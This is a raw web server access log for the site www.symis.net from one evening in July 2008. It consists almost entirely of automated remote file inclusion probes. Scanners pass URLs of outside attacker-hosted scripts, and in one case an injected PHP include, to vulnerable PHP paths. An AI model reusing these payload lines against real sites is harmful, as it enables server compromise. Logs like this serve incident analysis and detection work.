220.110.178.66 - - [31/Jul/2008:17:05:05 -0700] "GET //index.php?G_JGALL[inc_path]=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.symis.net"
220.110.178.66 - - [31/Jul/2008:17:05:05 -0700] "GET /logs//index.php?G_JGALL[inc_path]=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.symis.net"
74.6.22.164 - - [31/Jul/2008:17:08:09 -0700] "GET /logs/?D=D HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.symis.net"
207.58.181.13 - - [31/Jul/2008:17:09:48 -0700] "GET //skin/zero_vote/error.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
207.58.181.13 - - [31/Jul/2008:17:12:09 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
207.58.181.13 - - [31/Jul/2008:17:12:09 -0700] "GET //skin/zero_vote/error.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
207.58.181.13 - - [31/Jul/2008:17:12:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
72.243.169.10 - - [31/Jul/2008:17:12:27 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
72.243.169.10 - - [31/Jul/2008:17:12:28 -0700] "GET //?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 647 "-" "libwww-perl/5.805" "www.symis.net"
72.243.169.10 - - [31/Jul/2008:17:12:28 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.symis.net"
207.58.181.13 - - [31/Jul/2008:17:13:20 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
200.206.182.158 - - [31/Jul/2008:17:19:48 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
200.206.182.158 - - [31/Jul/2008:17:19:49 -0700] "GET //skin/zero_vote/error.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
200.206.182.158 - - [31/Jul/2008:17:19:49 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:17:21:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ifbbegitimleri.com//claroline/tracking/id-xxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:17:21:01 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ifbbegitimleri.com//claroline/tracking/id-xxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.symis.net"
200.206.182.158 - - [31/Jul/2008:17:21:18 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:21:19 -0700] "GET /logs/access_080531.log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:21:19 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:21:19 -0700] "GET /logs/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:21:21 -0700] "GET /logs/access.log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:22:22 -0700] "GET /logs/access.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:22:22 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:22:22 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
200.204.109.42 - - [31/Jul/2008:17:24:11 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
200.204.109.42 - - [31/Jul/2008:17:24:15 -0700] "GET //skin/zero_vote/error.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
200.204.109.42 - - [31/Jul/2008:17:24:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:26:13 -0700] "GET /logs/access_080531.log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:26:13 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:26:14 -0700] "GET /logs/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
72.243.169.10 - - [31/Jul/2008:17:26:14 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
84.244.158.105 - - [31/Jul/2008:17:26:16 -0700] "GET /logs/access.log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://lajang.ifastnet.com/miss/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
200.204.109.42 - - [31/Jul/2008:17:26:16 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
213.168.176.11 - - [31/Jul/2008:17:34:39 -0700] "GET /logs/access_080701.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGE_DIR]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
213.168.176.11 - - [31/Jul/2008:17:34:39 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGE_DIR]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
213.168.176.11 - - [31/Jul/2008:17:34:40 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGE_DIR]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
80.231.0.98 - - [31/Jul/2008:17:36:06 -0700] "GET /errors.php?error=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
207.210.115.114 - - [31/Jul/2008:17:41:42 -0700] "GET /logs/access_080601.log///vwar/backup/errors.php?error=http://www.elportacho.com/img/idrox.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.symis.net"
207.210.115.114 - - [31/Jul/2008:17:41:42 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.elportacho.com/img/idrox.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.symis.net"
207.210.115.114 - - [31/Jul/2008:17:41:42 -0700] "GET ///vwar/backup/errors.php?error=http://www.elportacho.com/img/idrox.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:17:46:15 -0700] "GET /logs/access_080601.log/errors.php?error=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:17:46:15 -0700] "GET /errors.php?error=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:17:46:15 -0700] "GET /logs/errors.php?error=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
151.1.210.219 - - [31/Jul/2008:17:47:21 -0700] "GET //skin/zero_vote/error.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
151.1.210.219 - - [31/Jul/2008:17:47:32 -0700] "GET //skin/zero_vote/error.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:17:48:47 -0700] "GET /errors.php?error=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
213.168.176.11 - - [31/Jul/2008:17:50:51 -0700] "GET /logs/access_080701.log/index.php?mosConfig_absolute_path=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
213.168.176.11 - - [31/Jul/2008:17:50:52 -0700] "GET /index.php?mosConfig_absolute_path=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
213.168.176.11 - - [31/Jul/2008:17:50:53 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
207.58.181.13 - - [31/Jul/2008:17:51:51 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
200.201.8.9 - - [31/Jul/2008:17:52:17 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.netops-fr.info/remote/ident.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
204.15.10.22 - - [31/Jul/2008:17:52:20 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.symis.net"
204.15.10.22 - - [31/Jul/2008:17:52:20 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:17:53:21 -0700] "GET /logs/access.log/errors.php?error=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:17:53:21 -0700] "GET /errors.php?error=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:17:53:22 -0700] "GET /logs/errors.php?error=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
85.214.88.11 - - [31/Jul/2008:17:53:55 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battalion-from-hell.com/modules/vwar/convert/cacaid.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.symis.net"
85.214.88.11 - - [31/Jul/2008:17:53:55 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battalion-from-hell.com/modules/vwar/convert/cacaid.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.symis.net"
207.58.181.13 - - [31/Jul/2008:17:55:34 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
207.58.181.13 - - [31/Jul/2008:17:55:34 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
207.58.181.13 - - [31/Jul/2008:17:55:34 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
80.231.0.98 - - [31/Jul/2008:17:55:41 -0700] "GET /logs/access_080701.log/errors.php?error=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
80.231.0.98 - - [31/Jul/2008:17:55:42 -0700] "GET /logs/errors.php?error=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
151.1.210.219 - - [31/Jul/2008:18:02:00 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
151.1.210.219 - - [31/Jul/2008:18:02:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
151.1.210.219 - - [31/Jul/2008:18:02:53 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
151.1.210.219 - - [31/Jul/2008:18:02:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
62.169.0.50 - - [31/Jul/2008:18:02:56 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.symis.net"
62.169.0.50 - - [31/Jul/2008:18:02:56 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.symis.net"
200.201.8.9 - - [31/Jul/2008:18:04:30 -0700] "GET /logs/access_080531.log%20//?path%5Bdocroot%5D=http://www.netops-fr.info/remote/ident.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
72.9.145.107 - - [31/Jul/2008:18:07:16 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.symis.net"
72.9.145.107 - - [31/Jul/2008:18:07:16 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.symis.net"
201.130.79.130 - - [31/Jul/2008:18:19:09 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.battalion-from-hell.com/modules/vwar/convert/cacaid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.symis.net"
201.130.79.130 - - [31/Jul/2008:18:19:09 -0700] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.battalion-from-hell.com/modules/vwar/convert/cacaid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:18:25:02 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:18:25:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:18:25:02 -0700] "GET //skin/zero_vote/error.php?dir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:18:25:03 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:18:25:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:18:25:03 -0700] "GET //skin/zero_vote/error.php?dir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:18:25:06 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?dir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.symis.net"
64.38.20.210 - - [31/Jul/2008:18:25:06 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?dir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.symis.net"
219.252.47.50 - - [31/Jul/2008:18:36:13 -0700] "GET /errors.php?error=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.symis.net"
219.252.47.50 - - [31/Jul/2008:18:36:13 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.symis.net"
200.206.182.158 - - [31/Jul/2008:18:56:09 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
200.206.182.158 - - [31/Jul/2008:18:56:10 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
200.206.182.158 - - [31/Jul/2008:18:56:10 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
200.204.109.42 - - [31/Jul/2008:18:58:50 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
200.204.109.42 - - [31/Jul/2008:18:58:51 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
200.204.109.42 - - [31/Jul/2008:18:58:51 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
80.67.26.157 - - [31/Jul/2008:18:59:55 -0700] "GET /logs/access_080701.log/include.php?path[docroot]=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
80.67.26.157 - - [31/Jul/2008:18:59:55 -0700] "GET /include.php?path[docroot]=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
80.67.26.157 - - [31/Jul/2008:18:59:55 -0700] "GET /logs/include.php?path[docroot]=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:00:50 -0700] "GET /errors.php?error=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:01:50 -0700] "GET /logs/access.log/errors.php?error=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:01:50 -0700] "GET /errors.php?error=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:01:51 -0700] "GET /logs/errors.php?error=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:19:01:54 -0700] "GET /logs/access_080601.log//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:19:01:54 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:19:01:54 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
84.21.71.133 - - [31/Jul/2008:19:17:33 -0700] "GET /logs/access_080601.log//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
84.21.71.133 - - [31/Jul/2008:19:17:33 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
84.21.71.133 - - [31/Jul/2008:19:17:33 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:17:43 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:19:25:35 -0700] "GET /admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:19:25:35 -0700] "GET /logs/access_080601.log/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:19:25:35 -0700] "GET /logs/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:31:29 -0700] "GET /logs/access_080601.log/errors.php?error=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
210.87.251.48 - - [31/Jul/2008:19:33:37 -0700] "GET /logs/access_080701.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
210.87.251.41 - - [31/Jul/2008:19:33:38 -0700] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
210.87.251.48 - - [31/Jul/2008:19:33:39 -0700] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:34:42 -0700] "GET /logs/errors.php?error=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:34:42 -0700] "GET /logs/errors.php?error=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:34:43 -0700] "GET /errors.php?error=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:34:43 -0700] "GET /errors.php?error=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
84.21.71.133 - - [31/Jul/2008:19:36:12 -0700] "GET /admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
